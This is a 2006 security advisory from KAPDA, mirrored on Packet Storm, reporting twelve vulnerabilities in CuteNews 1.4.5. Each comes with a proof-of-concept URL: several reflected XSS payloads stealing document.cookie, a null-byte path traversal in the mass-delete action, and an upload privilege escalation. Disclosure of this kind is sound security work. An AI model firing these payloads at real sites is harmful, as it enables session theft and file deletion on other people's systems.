kapda-450.txt

2006-11-27T00:00:00
ID PACKETSTORM:52490
Type packetstorm
Reporter trueend5
Modified 2006-11-27T00:00:00

Description

                                        
                                            `  
  
Product: cutenews 1.4.5  
Vendor: http://cutephp.com  
  
  
The Results through security analysis of cutenews  
1.4.5  
[provided by KAPDA.ir]  
--------------------------------------------------  
  
  
  
Test plan:  
Manual penetration testing: YES  
Using automated tools: NO  
Code Auditing: YES  
  
  
Statistical Results from 'security Audit' perspective  
  
TOTAL UNIQUE BUGS (12)   
  
Number of integration errors: 3   
Type: Path Disclosure , Authorization error  
(privileges escalation), XSS  
PoC:index.php?debug  
DREAD Severity: 7 (Low)  
PoC:index.php?mod=images&subaction=upload  
DREAD Severity: 12 (Medium)  
PoC:rss.php?rss_news_include_url=aAa&rss_title=<script>alert(document.cookie)</script>  
DREAD Severity: 8 (Medium)  
  
  
  
Number of Technical errors: 9  
Type: XSS ,Html Injection, Path disclosure, Path  
traversal  
  
PoC:show_news.php?KAPDA="><script>alert()</script>  
DREAD Severity: 7 (Low)  
PoC:index.php?mod=<script>alert(document.cookie)</script>  
DREAD Severity: 8 (Medium)  
PoC:search.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E  
DREAD Severity: 8 (Medium)  
PoC:index.php?mod=images&action=preview&image=>"</script><script>alert(document.cookie)</script>  
DREAD Severity: 8 (Medium)  
PoC:mod=images&action=quick&area='</script><script>alert(document.cookie)</script>  
DREAD Severity: 8 (Medium)  
PoC:index.php?mod=massactions&action=mass_delete&source="><script>alert(document.cookie)</script>  
DREAD Severity: 8 (Medium)  
PoC:Story  
field:</textarea><script>alert(document.cookie)</script>  
DREAD Severity: 12 (Medium)  
PoC:index.php?mod=massactions&action=mass_delete&selected_news=)  
DREAD Severity: 7 (Low)  
PoC:index.php?mod=massactions&action=do_mass_delete&selected_news=1&source=../upimages/ddddd.php%00  
DREAD Severity: 10 (Medium)  
  
Number of Logical errors: 0  
  
  
Statistical Results from 'functional Risk Base'  
perspective  
  
  
Authentication mechanism: passed  
Use a policy of least-privileged accounts: passed  
Session Management: passed  
Cookie Management: passed  
Sensitive Data Management: passed  
Cryptography:passed  
Error handling: Passed But with negligence  
Authorization: Passed But with negligence  
Configuration Management:Passed But with negligence  
PHP Coding Performance: Passed But with negligence  
Security by design: Passed But with negligence  
Note: using Extract() improperly, leads to several  
cross site scripting bugs.  
Input/Data validation: Not passed  
Auditing and Logging: Not Passed  
  
  
Statistical Results from 'Security Metrics'  
perspective  
  
  
Number of discovered bugs: 15   
Number of reviewed Code Lines: 6000  
Bugs per 10KLOC: 25   
Vulnerabilities severity average: Low  
Number of discovered bugs after stable release: 15  
Number of 'Documents' pages relevant to security: 1  
Quality of Security support: Moderate  
  
  
  
Security Grade at the current version (1.4.5) From  
Kapda : B-  
Note: All Grades are: A , B+ , B , B- , C+ , C , C- ,  
D  
  
  
Reference: http://www.kapda.ir/advisory-450.html  
  
  
  
____________________________________________________________________________________  
Sponsored Link  
  
Online degrees - find the right program to advance your career.  
Www.nextag.com  
`